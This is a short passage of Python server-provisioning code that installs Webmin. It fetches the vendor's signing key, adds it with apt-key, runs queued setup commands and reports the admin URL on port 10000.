# 'wget http://www.webmin.com/jcameron-key.asc',
# 'sudo apt-key add jcameron-key.asc',
]
self.curl('http://www.webmin.com/jcameron-key.asc', 'jcameron-key.asc')
self.run('sudo apt-key add jcameron-key.asc')
        for cmd in cmds:
            self.run(cmd)
        # A new apt repository was just added, so make the next _apt() call run
        # apt-get update again before the webmin package is installed.
        Bash.APTUPDATED = False
self.info('Webmin', 'http://{}:10000 (user & password for any user that can sudo)'.format(self.args.servername))
``` |